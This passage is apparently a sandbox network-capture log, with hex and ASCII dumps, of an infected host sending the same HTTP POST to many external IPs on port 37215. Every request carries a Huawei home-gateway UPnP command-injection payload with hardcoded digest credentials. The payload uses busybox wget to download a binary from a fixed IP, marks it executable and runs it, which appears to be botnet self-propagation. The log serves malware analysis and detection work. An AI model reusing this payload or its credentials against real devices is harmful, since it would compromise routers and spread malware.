                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              156192.168.2.1556060190.30.148.12737215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.036313057 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              157192.168.2.1554854197.142.0.2337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.037725925 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              158192.168.2.1544948223.189.102.22837215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.037733078 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              159192.168.2.1541536222.110.30.16037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.037755013 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              160192.168.2.1545696190.26.170.21837215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.037794113 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              161192.168.2.155674437.170.107.3137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.037812948 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              162192.168.2.1555380157.92.60.13837215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.037889957 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              163192.168.2.155897031.154.175.6937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.037890911 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              164192.168.2.153643045.36.223.23937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.037893057 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              165192.168.2.155625631.86.73.3637215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.037914038 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
